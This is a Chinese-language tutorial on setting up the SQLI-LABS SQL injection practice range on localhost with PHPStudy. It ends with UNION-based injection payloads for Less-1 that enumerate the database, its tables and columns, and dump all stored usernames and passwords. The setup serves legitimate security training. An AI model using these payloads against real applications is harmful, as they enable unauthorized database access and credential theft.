SQL注入练习场:PHPStudy+SQLI-LABS靶场搭建教程(零基础友好版)

注意:文中涉及演示均为模拟测试,切勿用于真实环境,任何未授权测试都是违法行为!

一、环境准备

  1. 下载PHPStudy
    官网下载地址:https://www.xp.cn/php-study(选择Windows版)

安装时建议选择自定义路径 (如 D:\phpstudy_pro),避免系统盘权限问题

  1. 下载SQLI-LABS源码
    从GitHub获取源码包:https://github.com/Audi-1/sqli-labs

    下载完成后解压,将文件夹重命名为sqli-labs(避免中文路径)。

二、PHPStudy配置

  1. 启动基础服务
    打开PHPStudy,启动ApacheMySQL 服务(图2:服务启动界面)。

若MySQL启动失败,检查端口是否被占用(默认3306)。

  1. 切换PHP版本
    点击左侧菜单【网站】→ 选择【管理】→【PHP版本】→更多→ 安装PHP5.5.9 (SQLI-LABS不支持PHP7+)。
    切换后需重启Apache服务(图3:PHP版本切换界面)。

三、部署SQLI-LABS靶场

  1. 放置源码文件

    sqlilabs文件夹复制到PHPStudy的网站根目录(默认路径:D:\phpstudy_pro\WWW)。

  2. 配置数据库连接

    打开文件sqlilabs/sql-connections/db-creds.inc,修改以下参数:

    php 复制代码
    $dbuser = 'root';    // 数据库用户名(默认)
    $dbpass = 'root';    // 数据库密码(若未修改则为空)

四、初始化靶场数据库

  1. 访问靶场页面
    浏览器输入http://localhost/sqli-labs/,进入SQLI-LABS首页。

点击页面中的Setup/reset Database for labs 链接

  1. 验证初始化结果
    若显示Congratulations! Database is connected...,表示数据库创建成功。
    若报错mysql_connect() undefined,需检查PHP版本是否为5.x 。

五、开始注入练习

  1. 选择关卡
    返回首页点击Less-1 (基础注入关卡),通过URL参数?id=1测试注入点。
    示例Payload:?id=1' and 1=2 union select 1,2,3 --+查看显示位

    ?id=1' and 1=2 union select 1,2,database()--+显示出数据库名

    ?id=1' and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()
    查看数据库的所有表

    ?id=1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users' --+查看users表中的字段

    ?id=1' and 1=2 union select 1,2,group_concat(username,0x7e,password) from security.users --+查看全部用户名和密码

还可以下载phpmyadmin管理数据库

  1. 常见问题排查
    数据库连接失败 :检查db-creds.inc密码是否与PHPStudy的MySQL一致。
    页面无法访问 :确认sqlilabs文件夹是否位于WWW目录,且Apache端口未被占用。
相关推荐
Database_Cool_3 分钟前
数据库性能不够用,升级到什么方案好?阿里云 PolarDB(云原生数据库领导者,兼容 MySQL/PostgreSQL/Oracle)平滑升级与百倍弹性
数据库·阿里云·云原生
程序猿秃头之路7 分钟前
DDD 系列:聚合和聚合根详解
数据库·oracle·ddd·领域驱动设计
网安蟹佬霸17 分钟前
我国网络安全人才缺口现状、成因与对策研究
安全·web安全
码上上班1 小时前
Mongodb课程
数据库·mongodb
农村小镇哥1 小时前
Oracle中的锁和10704对高级队列锁
数据库·oracle
峥无1 小时前
SQL性能调优:从执行计划看懂索引的使用与失效
数据库·sql
xyj29175964112 小时前
在Trae中配置数据库MCP
数据库·ai·mcp
廋到被风吹走2 小时前
【AI】【Claude】从 Prompt 到 Agent 的完整进阶地图
数据库·人工智能·prompt
数智化管理手记2 小时前
智能财务能替代人工核算吗?智能财务核心功能包含哪些?
大数据·网络·数据库·数据挖掘·精益工程
金智维科技官方2 小时前
DeepSeek接入企业系统:流程自动化新玩法
大数据·数据库·人工智能